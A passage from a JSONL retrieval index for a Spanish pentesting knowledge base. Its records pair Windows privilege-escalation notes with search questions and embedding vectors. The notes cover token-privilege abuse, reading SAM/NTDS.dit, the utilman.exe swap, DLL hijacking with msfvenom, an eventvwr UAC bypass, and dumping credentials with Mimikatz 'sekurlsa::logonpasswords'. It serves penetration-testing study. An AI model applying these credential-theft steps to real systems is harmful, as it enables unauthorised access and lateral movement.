β†’ lees ficheros restringidos (copias SAM/SYSTEM, NTDS.dit)\nSeRestorePrivilege β†’ escribes donde quieras: sustituye utilman.exe por cmd.exe\nSeDebugPrivilege β†’ vuelcas LSASS β†’ Mimikatz\nSeTakeOwnership β†’ te apropias de objetos protegidos\n```", "indexar": "con quΓ© puedo sustituir utilman.exe por cmd.exe para escribir donde quiera", "v": [-0.11365, 0.06203, -0.17375, -0.00344, 0.14661, -0.09277, -0.0626, 0.00336, -0.01325, -0.12309, -0.112, -0.02878, -0.00583, -0.03489, -0.0689, -0.04026, 0.07403, 0.02782, 0.0578, -0.02383, 0.02514, -0.01573, -0.03086, 0.09071, 0.02128, 0.18943, -0.11855, 0.00261, -0.02971, -0.08082, -0.04613, 0.12119, 0.05339, -0.0925, 0.07835, 0.07564, 0.06291, -0.01825, 0.03649, 0.14168, 0.16297, 0.0369, -0.152, 0.04414, -0.01499, -0.07528, 0.06067, 0.01489, 0.18043, -0.02449, -0.01962, -0.11403, -0.0731, 0.00301, 0.11224, 0.04789, 0.17354, -0.15642, -0.00925, 0.02544, -0.07091, 0.04847, 0.04191, 0.07514, 0.04397, 0.0781, 0.05311, -0.10167, -0.12367, 0.13338, -0.08715, 0.01546, -0.0501, -0.00453, 0.01615, -0.10311, -0.11522, -0.05825, 0.08088, 0.02557, -0.02277, 0.03967, -0.12476, -0.09238, 0.04022, -0.03048, -0.06949, -0.09107, -0.02889, -0.03915, 0.11929, -0.07348, 0.0183, 0.03278, 0.05918, -0.08525, 0.01337, 0.04737, 0.0733, 0.05294, -0.0217, 0.01659, -0.03886, 0.1251, -0.09067, -0.06538, -0.0518, 0.0758, -0.06695, 0.04817, 0.07904, 0.01134, 0.00305, 0.00378, -0.01867, -0.07011, -0.07705, -0.00247, -0.05587, -0.01869, -0.03912, -0.04681, -0.07311, 0.01435, -0.0231, -0.07265, -0.02273, 0.10239, -0.02129, 0.004, 0.02418, -0.04085, 0.05336, -0.10856, -0.07187, 0.00791, 0.05787, 0.03449, -0.11306, -0.04344, 0.05612, 0.09233, -0.03469, 0.01345, -0.00415, 0.00821, -0.00044, 0.02983, 0.04635, 0.00956, 0.08138, -0.01214, 0.02838, 0.06101, -0.06155, -0.00836, 0.05424, 0.05927, 0.00217, -0.00744, -0.05709, -0.03182, -0.05088, -0.01819, -0.03871, 0.02445, -0.00323, -0.04424, 0.0213, 0.09197, -0.04812, 0.09596, 0.02091, -0.12211, 0.03927, -0.08039, -0.00364, -0.12149, 0.04846, -0.00613, -0.02022, -0.01482, 0.01265, 0.01046, 0.01349, 0.01032, 0.03524, -0.00929, -0.10808, 0.01818, -0.05162, -0.0145, -0.03374, -0.08979, 0.01256, 0.00398, -0.00965, -0.04802, 0.00439, -0.076, -0.05258, 0.02009, -0.01633, -0.0351, 0.04863, -0.01438, -0.06417, -0.02355, -0.04463, -0.01172, 0.04644, 0.01897, 0.00868, 0.06015, -0.02356, -0.02736, 0.04681, 0.02991, 0.02166, 0.03658, -0.00047, 0.01452, 0.03522, -0.09838, 0.00847, -0.03817, 0.02291, -0.03702, 0.00481, 0.06217, -0.02511, -0.00083, 0.00791, -0.03955, -0.00278, 0.00459, -0.0322, -0.06979, 0.01272, 0.00183, -0.01943, 0.04661, -0.02456, -0.06776, -0.0318, -0.00201, -0.04167, 0.0111, -0.00621, -0.02168, -0.07785, 0.03063, 0.01674, -0.0269, -0.0251, 0.022]} +{"tipo": "pregunta", "herramienta": "Privesc Windows", "perfil": "PENTESTERS", "fichero": "conocimiento/04 - Privesc/Privesc Windows.md", "tema": "privesc", "fuente": null, "licencia": null, "texto": "## Privilegios de token (SeXxxPrivilege)\n```\nSeImpersonate / SeAssignPrimaryToken β†’ Potato attacks\nSeBackupPrivilege β†’ lees ficheros restringidos (copias SAM/SYSTEM, NTDS.dit)\nSeRestorePrivilege β†’ escribes donde quieras: sustituye utilman.exe por cmd.exe\nSeDebugPrivilege β†’ vuelcas LSASS β†’ Mimikatz\nSeTakeOwnership β†’ te apropias de objetos protegidos\n```", "indexar": "cual es una tecnica para vaciar la memoria de LSASS y leer credenciales", "v": [-0.09042, -0.11536, -0.00602, 0.06169, 0.0117, -0.03364, 0.06238, -0.04244, -0.03224, 0.01465, -0.15832, -0.07937, -0.04736, 0.05233, 0.20029, 0.11263, 0.0966, 0.00581, 0.07701, 0.04496, -0.03003, -0.17414, -0.19957, 0.11281, -0.00251, 0.03742, 0.09935, -0.15152, -0.05654, 0.04361, -0.14344, 0.09469, 0.00123, -0.00128, 0.04161, 0.12266, -0.13243, 0.0272, -0.01737, 0.20829, -0.0045, 0.06823, 0.02778, -0.01483, 0.14939, -0.19296, 0.04557, 0.05228, 0.00831, -0.12374, -0.07797, 0.06864, 0.06516, 0.04541, -0.02292, -0.00475, 0.02439, -0.04158, -0.0103, -0.0485, -0.05325, 0.00253, -0.01038, -0.00316, 0.10471, -0.06792, -0.00521, -0.05588, -0.00136, 0.04147, -0.1016, 0.03973, -0.00151, 0.02248, -0.05437, 0.03204, 0.01322, 0.07735, 0.12377, -0.02755, 0.07573, -0.09532, -0.04411, 0.01307, 0.0888, 0.08824, -0.01658, -0.0167, 0.0209, 0.00881, 0.01317, 0.13238, -0.0537, 0.1018, 0.05901, -0.00884, 0.02367, 0.15258, -0.00512, 0.04417, -0.00914, -0.11086, -0.06245, 0.1127, 0.03497, 0.04174, -0.00181, 0.03198, -0.05831, -0.07119, 0.0146, 0.024, -0.12771, 0.04296, -0.07047, 0.01252, 0.0449, -0.0093, 0.10061, -0.05122, 0.01748, -0.04077, 0.02571, -0.03878, 0.03638, 0.04819, -0.08314, 0.0294, -0.03046, 0.05303, -0.01468, 0.04485, -0.02028, -0.07593, 0.05262, 0.01693, 0.02258, 0.01059, -0.08514, 0.00775, 0.05027, 0.03562, -0.02648, -0.03537, -0.05456, 0.07014, 0.0735, -0.02472, 0.00827, -0.06637, -0.03536, 0.06309, 0.06516, 0.02811, 0.00793, -0.03396, 0.06134, -0.01976, -0.04786, 0.06951, -0.08027, 0.06727, 0.02637, -0.0272, -0.03715, -0.06881, -0.06444, 0.0111, 0.03294, 0.03861, -0.01662, -0.1401, -0.08032, 0.01053, 0.02887, -0.06425, -0.03893, -0.01823, 0.00235, -0.01861, 0.00076, -0.03705, -0.01877, 0.06182, -0.00039, -0.04118, -0.01462, -0.02134, 0.00208, -0.04963, -0.02078, -0.01548, 0.01737, -0.03741, 0.01181, -0.05401, 0.00779, -0.03638, 0.04411, 0.05144, -0.08043, 0.07336, -0.00962, 0.03575, 0.02045, 0.07356, 0.04107, -0.01997, -0.06436, -0.00345, 0.02644, -0.06745, 0.04213, -0.04932, -0.08951, -0.00912, -0.02296, -0.00225, -0.0468, -0.01976, 0.04346, 0.00199, 0.07577, -0.024, -0.08366, -0.04006, -0.01876, 0.05516, -0.01655, -0.01197, -0.04692, 0.07526, -0.02316, -0.01047, 0.05149, 0.05579, 0.00256, -0.01325, -0.01327, -0.02527, 0.04356, 0.00929, -0.07429, 0.01689, -0.05702, -0.04665, -0.06128, 0.07134, 0.04057, -0.01907, -0.01314, -0.01308, 0.05156, -0.04149, 0.05437, -0.06643]} +{"tipo": "pregunta", "herramienta": "Privesc Windows", "perfil": "PENTESTERS", "fichero": "conocimiento/04 - Privesc/Privesc Windows.md", "tema": "privesc", "fuente": null, "licencia": null, "texto": "## Otras tΓ©cnicas (del sitio)\n- **DLL hijacking**: servicio que carga una DLL por ruta insegura β†’ pones tu DLL (msfvenom `-f dll`) y reinicias el servicio.\n- **UAC bypass** vΓ­a `eventvwr.exe` (hijack de registro) cuando ya tienes cΓ³digo en un user del grupo Administrators.\n- **Unattend.xml / cmdkey / registro** β†’ credenciales en disco (ya en los 10 olvidados).", "indexar": "que tΓ©cnica sirve para inyectar una DLL en un servicio de Windows", "v": [-0.03911, 0.01427, -0.13394, -0.06079, 0.06278, -0.11655, -0.09817, -0.04581, 0.15117, -0.00261, -0.06367, -0.20696, -0.02084, -0.16184, -0.09461, -0.0546, 0.04392, -0.21668, 0.06898, -0.03278, -0.02705, 0.01561, -0.10273, -0.00365, -0.08319, 0.01027, 0.03898, -0.13594, -0.23961, 0.0314, 0.00417, -0.04061, -0.01825, -0.06936, 0.02191, -0.10593, 0.00425, 0.10527, 0.05183, 0.07852, -0.04471, -0.04316, -0.08914, 0.0957, 0.0483, -0.01043, 0.11223, 0.00062, 0.10455, 0.04952, -0.03464, 0.00373, -0.03007, -0.03071, 0.00721, -0.01636, 0.0581, -0.07115, -0.03716, 0.00709, -0.06986, -0.00409, -0.05927, 0.03256, 0.06554, -0.05943, -0.04484, -0.02973, 0.05024, -0.02323, -0.0981, 0.0057, 0.08525, -0.06996, -0.08023, 0.03022, -0.10903, 0.01164, 0.08299, -0.07068, 0.07264, 0.08373, -0.09721, -0.07035, -0.03182, -0.04313, 0.09072, -0.03021, 0.07134, -0.19583, 0.14825, 0.0496, -0.00896, 0.08392, 0.05075, 0.00935, 0.04255, -0.00399, 0.00362, 0.02321, 0.07604, -0.11309, -0.0397, 0.10496, -0.04701, 0.08437, 0.03029, -0.10928, -0.03604, -0.10583, -0.00092, 0.10406, -0.08037, 0.02577, -0.06907, -0.06779, -0.0283, -0.10141, -0.05444, 0.09448, -0.05839, 0.0261, 0.02487, -0.03391, 0.01029, -0.03893, -0.03824, 0.0031, -0.03735, 0.02041, 0.06489, -0.01551, -0.08429, -0.05856, -0.00071, 0.0387, 0.07337, -0.01021, -0.02717, -0.01527, 0.06788, 0.12153, 0.03623, 0.03108, 0.02514, -0.00467, 0.15717, -0.03522, -0.04954, -0.0779, 0.09611, -0.01523, 0.00801, 0.08986, -0.07931, -0.03189, 0.02969, 0.04031, 0.01172, 0.07875, 0.0073, 0.02463, 0.04535, 0.01288, -0.0572, -0.00662, -0.04134, -0.03047, 0.06192, -0.02838, -0.05852, 0.00343, -0.08159, -0.02074, 0.00131, 0.05151, 0.00415, -0.03548, 0.01673, -0.03678, -0.07381, -0.03717, 0.06768, -0.00097, 0.03959, -0.00257, -0.08733, -0.00655, -0.01399, -0.03536, -0.03856, -0.05721, -0.02709, -0.0438, -0.02356, -0.05777, -0.06412, -0.01038, 0.01886, -0.02547, -0.08655, 0.00725, -0.0477, -0.00064, 0.04545, 0.00892, -0.01637, 0.04445, -0.01243, 0.04778, -0.00276, 0.0088, 0.05484, -0.04143, -0.02771, -0.06309, 0.06275, -0.03874, 0.01024, 0.03348, 0.03816, -0.02712, -0.00333, 0.00031, 0.00357, -0.03281, 0.00776, 0.00859, 0.04107, 0.03259, 0.02121, 0.07124, -0.00099, -0.00102, 0.0518, -0.00762, 0.04587, -0.0673, -0.00243, -0.08584, 0.02775, 0.0655, -0.03476, -0.04225, 0.00307, -0.04162, -0.03935, 0.01571, 0.00451, -0.06089, 0.01076, -0.0179, 0.04625, 0.0236, 0.04918, -0.02118]} +{"tipo": "pregunta", "herramienta": "Privesc Windows", "perfil": "PENTESTERS", "fichero": "conocimiento/04 - Privesc/Privesc Windows.md", "tema": "privesc", "fuente": null, "licencia": null, "texto": "## Otras tΓ©cnicas (del sitio)\n- **DLL hijacking**: servicio que carga una DLL por ruta insegura β†’ pones tu DLL (msfvenom `-f dll`) y reinicias el servicio.\n- **UAC bypass** vΓ­a `eventvwr.exe` (hijack de registro) cuando ya tienes cΓ³digo en un user del grupo Administrators.\n- **Unattend.xml / cmdkey / registro** β†’ credenciales en disco (ya en los 10 olvidados).", "indexar": "con que puedo acceder a credenciales guardadas en el registro de Windows", "v": [-0.03132, 0.05879, -0.07849, -0.10708, 0.14758, -0.00237, -0.00801, 0.00446, -0.04989, -0.16994, -0.00777, -0.08739, -0.11019, -0.11825, 0.02151, 0.08161, 0.01698, 0.03144, -0.00327, 0.01892, 0.03097, -0.0665, -0.01638, 0.04388, 0.00563, -0.01383, 0.02917, -0.00968, -0.01394, 0.03516, 0.01176, -0.00707, -0.12236, 0.0224, -0.01476, 0.08504, -0.09843, 0.15162, 0.03167, 0.08403, 0.01742, 0.15068, 0.04851, 0.05309, 0.09639, -0.10756, 0.09218, 0.0334, -0.01669, -0.01811, -0.0614, -0.12318, -0.13826, -0.12484, 0.01208, -0.01862, 0.14517, -0.00733, 0.01141, -0.02277, -0.09244, 0.17778, -0.01944, 0.10646, -0.07683, -0.05091, 0.10845, -0.01226, 0.00356, 0.10723, -0.063, -0.00536, 0.04138, -0.12896, -0.00972, -0.01316, -0.03692, -0.05699, 0.06581, 0.01348, 0.02059, -0.02257, 0.07146, -0.05173, -0.00582, -0.14583, -0.13229, -0.0868, -0.00311, -0.07835, 0.16879, -0.02172, -0.10286, 0.08156, 0.05584, -0.00543, -0.03766, -0.04057, -0.04639, 0.05473, -0.04876, -0.01271, -0.04804, 0.1501, -0.03954, 0.06718, 0.01195, -0.0534, -0.00219, -0.04812, 0.0484, 0.10324, -0.17215, -0.00817, -0.02245, 0.09079, -0.03609, -0.09638, 0.06695, 0.06367, -0.02781, -0.1062, -0.03234, -0.06281, 0.02667, -0.00367, -0.08885, 0.089, -0.12418, 0.00081, -0.01484, 0.03704, -0.10278, -0.05898, -0.01027, 0.00704, -0.13633, 0.01303, 0.07233, 0.01265, 0.08253, 0.05904, 0.04046, -0.04604, -0.00947, -0.01772, 0.00054, -0.00254, -0.04393, -0.10719, 0.04932, -0.01738, -0.05689, 0.04873, -0.06237, 0.08712, 0.06597, 0.06416, 0.06321, 0.00352, -0.04552, 0.01061, -0.03113, -0.00668, -0.026, -0.02504, -0.01429, -0.00113, 0.02316, -0.00429, -0.08006, 0.07227, -0.04256, -0.04911, 0.05229, 0.01756, 0.00598, -0.03501, -0.02504, -0.01636, -0.11255, 0.01524, 0.01912, -0.03027, -0.02326, -0.00771, -0.06555, 0.05941, -0.05219, 0.03382, -0.01998, -0.00639, 0.063, -0.03782, 0.03147, -0.00041, -0.03024, 0.01219, -0.00117, -0.02214, -0.06213, -0.05042, -0.02061, -0.02966, 0.10279, 0.0623, -0.06636, 0.04593, 0.08311, 0.04235, 0.00664, -0.0436, 0.01002, -0.06604, -0.07757, -0.01111, -0.00209, -0.00173, -0.0198, -0.02393, 0.05735, 0.02332, 0.04385, 0.02552, 0.00932, -0.06871, -0.04521, 0.00228, 0.00791, 0.05086, -0.02469, 0.03079, -0.01262, 0.01595, 0.0522, 0.01564, -0.01153, -0.02215, -0.06769, -0.02227, -0.06324, 0.08693, -0.04261, -0.04865, -0.07369, -0.03271, -0.03564, 0.0321, 0.05743, -0.06991, 0.01371, -0.03311, 0.06003, -0.04661, 0.04201, 0.00251]} +{"tipo": "pregunta", "herramienta": "Privesc Windows", "perfil": "PENTESTERS", "fichero": "conocimiento/04 - Privesc/Privesc Windows.md", "tema": "privesc", "fuente": null, "licencia": null, "texto": "## Otras tΓ©cnicas (del sitio)\n- **DLL hijacking**: servicio que carga una DLL por ruta insegura β†’ pones tu DLL (msfvenom `-f dll`) y reinicias el servicio.\n- **UAC bypass** vΓ­a `eventvwr.exe` (hijack de registro) cuando ya tienes cΓ³digo en un user del grupo Administrators.\n- **Unattend.xml / cmdkey / registro** β†’ credenciales en disco (ya en los 10 olvidados).", "indexar": "cual es la forma de cargar cΓ³digo ejecutable directamente sobre un usuario administrador", "v": [0.05553, 0.07234, -0.04403, -0.11889, 0.01116, -0.1557, 0.07118, 0.03816, -0.12161, -0.13803, -0.15877, -0.16765, -0.01199, -0.01501, 0.06074, -0.07146, 0.15488, -0.06446, -0.00916, -0.03443, 0.04161, -0.00915, 0.01458, -0.06432, -0.08722, 0.06254, -0.02728, 0.0458, -0.1283, -0.08367, 0.019, 0.01843, 0.10882, -0.08291, 0.03522, 0.10375, 0.02265, 0.06469, -0.06493, 0.21717, -0.0418, 0.09869, -0.19275, 0.05748, -0.02559, 0.04875, 0.12721, -0.06915, 0.11038, -0.03747, -0.00492, -0.02443, -0.18251, -0.06524, 0.00815, -0.01271, 0.12974, -0.17301, 0.0621, 0.04836, 0.06776, -0.01498, 0.04776, -0.05286, -0.04817, 0.00673, 0.0834, 0.02539, -0.04654, 0.02247, 0.02741, 0.08614, -0.07042, 0.05008, 0.08709, 0.04848, -0.01374, 0.00983, 0.07087, 0.09368, 0.07156, -0.08918, -0.09636, -0.0343, -0.09675, -0.06762, -0.06641, -0.11585, 0.02076, -0.01032, 0.08842, -0.04974, 0.00319, 0.02888, 0.02299, -0.03625, 0.06064, 0.0271, 0.04003, 0.03697, 0.08827, 0.0105, 0.03962, 0.12636, 0.09171, 0.07027, -0.00938, -0.04823, 0.0443, -0.09356, 0.01601, -0.10526, -0.09409, -0.02975, -0.04925, -0.01272, -0.06408, -0.04241, -0.03741, -0.07942, -0.15326, 0.00415, -0.0213, 0.06045, 0.06306, 0.01592, 0.06309, 0.07099, -0.03225, -0.01321, -0.10069, -0.07059, 0.01987, -0.00573, -0.05363, 0.02434, -0.01979, -0.00886, 0.03182, 0.00145, 0.04573, 0.03503, 0.04798, 0.0702, 0.06721, 0.04118, -0.01911, -0.09313, -0.06755, 0.02027, 0.07056, 0.05069, -0.03788, 0.01373, -0.05679, 0.00031, 0.00944, -0.00789, -0.03811, 0.05863, -0.00983, -0.00923, -0.01921, -0.00482, -0.04735, -0.06953, -0.06603, -0.00426, 0.0299, 0.01302, -5e-05, 0.03246, 0.02923, -0.01143, 0.06354, -0.07205, -0.05189, -0.04846, 0.03968, -0.02324, -0.00464, 0.08941, 0.03745, 0.03087, -0.06013, -0.04754, 0.00871, 0.06377, -0.05619, 0.06281, 0.05775, 0.05633, 0.02203, -0.04188, -0.01265, -0.00763, 0.03622, 0.03531, -0.0707, -0.05781, -0.02787, 0.00444, -0.02259, -0.03839, 0.02439, 0.00125, -0.0321, 0.04191, -0.00087, 0.02201, 0.01505, 0.00455, 0.12001, -0.00866, -0.01931, -0.03756, 0.03152, -0.02443, 0.06007, -0.01338, -0.0526, 0.00829, 0.06954, -0.0081, 0.04008, -0.01216, 0.00448, 0.04739, -0.03363, 0.01483, -0.05247, 0.0364, 0.01098, 0.0123, 0.0776, 0.04708, 0.03805, 0.00706, -0.04712, -0.05303, 0.03696, 0.08276, 0.00032, -0.04061, -0.02344, -0.00941, -0.06913, 0.01892, -0.05853, -0.06534, 0.00968, 0.01021, 0.02963, -0.03271, -0.03174, -0.04607]} +{"tipo": "pregunta", "herramienta": "Privesc Windows", "perfil": "PENTESTERS", "fichero": "conocimiento/04 - Privesc/Privesc Windows.md", "tema": "privesc", "fuente": null, "licencia": null, "texto": "## Herramientas\n`PowerUp`, `PrivescCheck`, `Sherlock` (PowerShell) + `accesschk.exe` (SysInternals) β†’ ver Herramientas (Γ­ndice) y PEASS-ng.", "indexar": "que herramienta puedo usar para verificar si un sistema tiene permisos elevados?", "v": [0.08294, 0.16631, -0.25437, -0.16348, 0.07276, -0.07487, -0.06382, -0.1257, -0.05712, -0.18407, -0.09973, -0.03287, 0.01715, -0.05687, 0.1005, -0.01006, 0.0306, -0.12768, -0.02138, 0.02987, 0.06942, -0.10428, -0.1062, -0.07478, -0.09839, 0.10706, 0.01684, -0.11101, -0.2286, -0.03345, 0.00507, 0.06043, 0.05174, -0.05357, -0.09505, -0.03862, -0.03959, 0.06516, 0.05569, -0.00208, 0.02598, 0.07241, -0.04205, 0.00295, 0.02492, -0.02023, -0.0513, -0.00554, -0.06001, -0.01843, -0.0509, -0.08917, -0.14921, -0.03315, -0.02834, -0.15646, 0.16414, -0.05583, 0.00472, -0.06636, -0.0672, -0.02853, 0.02032, 0.02251, -0.04121, 0.01912, 0.06652, -0.03597, -0.05297, 0.05606, -0.03763, 0.05396, 0.06414, 0.03073, -0.00408, -0.01156, -0.01465, -0.04009, 0.08624, -0.01713, 0.03388, 0.03859, -0.08361, -0.02951, -0.08512, -0.15206, 0.02835, -0.09077, 0.02367, -0.07598, -0.01009, 0.06957, 0.02437, -0.00058, 0.07347, 0.00921, -0.02433, 0.03028, -0.06253, 0.03336, 0.14339, -0.04086, -0.00398, 0.09369, -0.06861, -0.02235, 0.02956, -0.07588, -0.02661, -0.04246, 0.01598, 0.01181, -0.07177, -0.02472, -0.0473, 0.06432, -0.05216, -0.12602, -0.06647, -0.06132, 0.03802, 0.01464, -0.03701, -0.04078, 0.08252, -0.02027, -0.02695, 0.14037, -0.01341, -0.01292, 0.01953, -0.05287, -0.06542, 0.01617, -0.06337, -0.03113, -0.03301, -0.04784, -0.03786, -0.00993, -0.01731, 0.08038, 0.00838, -0.09477, 0.08899, 0.05437, -0.05641, -0.03722, -0.06195, -0.07147, 0.02217, -0.03533, -0.0326, 0.07316, -0.02678, 0.02819, 0.00971, -0.05385, -0.04886, 0.03666, -0.01576, -0.04726, 0.02477, 0.06223, 0.041, 0.00822, 0.03523, -0.04215, 0.06823, 0.04434, 0.01094, 0.01018, 0.07616, -0.06371, 0.06034, -0.04723, -0.04793, -0.04427, -0.02229, -0.05894, -0.08092, 0.02822, -0.05463, -0.04878, -0.00042, -0.0025, 0.02937, 0.01531, 0.03577, 0.06292, 0.01775, 0.11519, 0.06421, -0.01217, 0.03688, 0.02606, 0.01633, -0.06522, 0.0109, -0.01758, -0.03571, 0.00916, -0.0287, -0.11802, 0.05499, 0.00781, 0.0012, 0.02325, 0.04539, 0.03644, 0.02597, -0.03649, 0.07982, -0.04683, -0.06985, -0.01063, -0.0292, 0.03262, -0.03713, -0.08462, 0.07276, 0.01408, 0.05357, 0.05039, 0.03462, 0.00265, 0.01568, 0.04776, -0.00872, 0.0342, 0.00195, -0.01236, -0.01804, -0.00884, 0.03432, -0.05606, 0.04652, -0.01214, -0.03371, -0.04247, 0.02051, 0.09451, 0.0273, -0.02203, -0.02834, -0.02367, -0.04495, -0.04813, -0.02824, -0.10157, 0.0129, 0.04304, 0.04646, -0.06907, 0.04258, -0.0349]} +{"tipo": "pregunta", "herramienta": "Privesc Windows", "perfil": "PENTESTERS", "fichero": "conocimiento/04 - Privesc/Privesc Windows.md", "tema": "privesc", "fuente": null, "licencia": null, "texto": "## Herramientas\n`PowerUp`, `PrivescCheck`, `Sherlock` (PowerShell) + `accesschk.exe` (SysInternals) β†’ ver Herramientas (Γ­ndice) y PEASS-ng.", "indexar": "existe alguna alternativa libre a PowerUp para auditorΓ­as de privilegios?", "v": [0.06163, 0.11343, -0.04414, -0.04416, 0.01519, 0.01926, 0.09028, -0.08801, -0.23691, -0.00855, 0.00786, -0.12321, -0.02319, 0.16379, -0.0352, -0.15887, 0.0648, -0.03711, 0.0523, 0.03494, 0.07795, 0.04443, -0.16827, -0.04265, -0.02013, -0.00097, 0.06035, -0.00561, 0.04115, 0.04477, 0.05453, 0.12662, 0.0492, -0.03782, -0.07356, 0.07579, 0.12093, 0.08584, 0.19002, -0.00664, 0.06386, 0.04051, 0.0633, 0.11984, 0.03314, -0.07949, -0.13897, 0.09558, -0.01694, 0.11334, -0.01549, -0.01266, -0.10877, -0.00177, 0.10824, -0.01202, -0.01832, -0.02988, -0.0951, -0.04217, -0.15511, 0.09479, 0.00128, -0.03686, -0.07171, 0.14244, -0.02225, -0.05223, 0.03784, 0.15968, -0.05606, -0.1113, 0.02428, -0.0284, -0.15302, -0.02075, 0.00694, -0.07955, -0.1324, 0.06886, 0.05374, 0.00725, -0.071, 0.07909, -0.11895, -0.03118, -0.01119, 0.01621, -0.06077, 0.06857, 0.01471, 0.04641, 0.02482, 0.09253, -0.01059, -0.08124, 0.00012, 0.0949, 0.013, -0.0144, 0.07851, 0.01352, -0.0375, 0.03031, 0.16021, 0.05845, 0.00149, -0.07951, 0.00221, 0.07607, -0.07544, 0.07702, -0.04924, -0.04052, -0.04244, 0.00207, 0.02624, 0.03205, -0.06872, 0.00465, 0.0534, -0.04336, -0.04919, -0.04256, -0.02123, -0.04448, 0.08215, 0.05748, 0.04905, 0.04411, 0.11071, -0.03632, -0.01096, -0.07894, -0.02608, -0.06877, -0.03669, 0.06956, -0.05336, -0.00629, -0.03699, 0.02007, -0.00739, 0.00687, -0.01627, -0.05286, -0.07182, -0.00275, -0.03138, -0.04275, -0.08081, -0.05024, -0.10572, 0.0662, 0.00402, 0.00091, -0.02243, -0.02299, -0.04861, 0.04997, -0.00299, -0.09299, 0.00754, 0.03383, -0.01131, 0.02204, 0.01166, -0.08393, -0.08543, -0.04159, 0.00478, 0.06955, 0.05775, -0.07744, 0.02284, -0.05218, 0.01584, -0.09521, 0.0143, -0.05021, -0.00377, 0.04956, -0.00351, -0.02645, 0.01096, -0.00699, 0.0106, 0.00965, 0.03844, -0.00058, -0.01712, -0.03806, 0.03034, -0.07731, 0.04825, 0.03347, 0.02795, -0.09832, -0.04742, 0.00175, -0.09263, -0.04082, -0.0053, -0.02286, -0.04591, -0.0141, 0.07159, 0.02569, 0.00992, 0.01111, 0.05494, 0.0335, 0.0339, -0.01196, 0.00094, 0.01988, 0.03605, -0.05223, -0.04957, 0.00076, -0.0465, -0.04554, 0.03927, 0.09278, 0.04435, 0.03286, 0.00884, -0.04008, -0.01468, 0.06894, 0.0162, -0.00921, 0.04691, 0.0186, -0.01054, -0.03039, -0.03575, 0.04586, 0.08787, 0.00745, 0.02666, 0.0002, 0.02456, 0.03497, -0.06415, 0.0167, -0.01029, -0.0752, -0.04335, -0.01929, 0.0658, -0.02148, -0.00374, 0.03156, 0.02635, 0.01069]} +{"tipo": "pregunta", "herramienta": "Privesc Windows", "perfil": "PENTESTERS", "fichero": "conocimiento/04 - Privesc/Privesc Windows.md", "tema": "privesc", "fuente": null, "licencia": null, "texto": "## Herramientas\n`PowerUp`, `PrivescCheck`, `Sherlock` (PowerShell) + `accesschk.exe` (SysInternals) β†’ ver Herramientas (Γ­ndice) y PEASS-ng.", "indexar": "con quΓ© programa puedo revisar el acceso a archivos con PowerShell o SysInternals?", "v": [-0.25794, -0.07208, 0.04523, -0.12717, 0.07818, -0.18204, -0.04707, -0.16794, -0.12779, 0.04757, -0.05445, -0.00173, 0.04501, -0.11377, 0.02664, 0.15377, 0.04234, 0.04496, 0.07282, 0.03027, -0.00439, -0.00015, -0.16089, -0.12443, -0.02154, 0.04715, -0.1114, 0.17189, 0.00531, -0.18542, -0.11138, -0.05893, 0.09399, -0.0394, -0.04433, 0.04533, 0.02476, 0.27715, 0.08885, -0.0029, -0.00018, 0.09447, -0.05528, 0.04038, 0.0987, -0.0692, 0.05318, -0.04739, 0.01609, -0.09222, -0.03926, -0.00369, -0.04256, -0.05501, 0.0312, -0.11205, -0.06616, -0.12626, -0.05392, 0.02827, -0.05066, 0.07141, 0.0659, 0.01598, -0.0431, -0.05686, -0.06409, 0.0161, -0.00437, 0.1627, -0.12735, 0.02534, 0.01169, -0.02943, -0.02768, 7e-05, -0.01525, -0.01335, -0.02148, -0.07298, -0.09757, 0.01008, 0.06481, 0.06229, -0.01413, 0.05015, -0.07134, -0.12012, -0.04362, -0.07888, 0.09813, 0.05977, -0.02437, 0.04948, 0.00173, 0.00533, 0.05635, 0.05389, -0.01837, -0.05395, -0.03671, -0.04488, -0.02751, 0.10437, -0.00384, 0.06773, -0.00901, 0.06545, -0.04499, 0.00474, 0.05234, 0.04013, -0.0066, -0.00531, -0.07361, 0.03692, -0.08578, -0.01906, -0.0317, -0.06813, -0.03979, 0.05232, -0.0569, -0.01912, 0.07629, 0.03491, 0.08613, 0.08557, -0.05752, 0.07225, 0.05548, -0.0253, 0.01253, -0.02363, -0.10191, -0.10131, -0.08365, 0.02945, -0.03137, -0.03078, 0.00209, 0.00707, 0.06892, 0.08754, -0.00049, -0.01083, -0.05075, 0.00605, -0.00523, -0.02546, -0.00626, -0.00644, 0.03979, 0.04511, -0.05725, 0.03661, 0.01477, -0.04573, -0.08754, -0.05926, -0.08769, 0.02821, -0.04912, -0.02956, 0.01216, -0.04736, -0.00019, 0.00364, 0.0092, 0.01564, 0.02249, 0.01444, -0.0121, -0.03615, -0.04121, 0.0237, 0.01225, -0.04004, 0.00317, -0.01691, -0.05363, -0.02207, -0.01074, -0.02624, -0.03577, 0.00612, -0.02159, 0.03056, 0.02704, -0.00904, -0.03927, 0.01022, 0.04971, -0.00246, 0.07981, -0.01423, -0.0311, 0.03169, -0.06845, -0.03115, -0.02606, -0.00666, -0.04317, 0.0297, 0.10046, 0.03124, 0.01242, -0.00749, 0.03304, 0.01805, 0.02741, -0.02853, 0.08849, 0.03679, -0.01269, -0.06042, -0.03071, 0.0371, 0.02231, 0.10876, -0.00049, 0.04144, 0.03968, 0.04588, 0.07742, -0.02788, -0.01348, -0.0323, -0.03387, 0.00631, -0.02874, 0.00078, -0.04452, 0.05304, 0.00199, -0.03907, -0.04784, 0.00646, 0.03371, -0.00096, -0.0385, 0.02243, 0.03332, -0.00247, -0.03792, 0.02376, -0.03107, -0.0597, 0.00376, 0.03825, 0.01206, 0.03106, -0.00854, -0.06135, 0.07491, -0.01248]} +{"tipo": "pregunta", "herramienta": "Privesc Windows", "perfil": "PENTESTERS", "fichero": "conocimiento/04 - Privesc/Privesc Windows.md", "tema": "privesc", "fuente": null, "licencia": null, "texto": "## Tras conseguir SYSTEM\n- Mimikatz β†’ `sekurlsa::logonpasswords` β†’ hashes/creds de dominio.\n- Esas creds β†’ Movimiento lateral y Active Directory.\n\nRelacionado: Potato attacks Β· Exploits conocidos Β· PEASS-ng Β· Privesc Linux Β· OSCP MOC", "indexar": "que herramienta sirve para extraer hashes de credenciales del dominio?", "v": [0.03531, -0.07948, -0.14335, -0.10907, 0.08295, -0.11266, -0.02281, -0.03747, -0.05539, -0.00097, -0.08264, 0.01954, -0.0927, -0.23073, 0.09404, 0.04707, 0.18457, -0.03615, -0.06131, -0.02439, -0.04429, -0.01524, -0.16999, -0.02298, -0.05776, -0.08793, -0.10497, 0.01544, -0.19121, 0.18107, 0.01542, 0.00233, -0.0674, 0.01147, -0.09543, 0.00521, 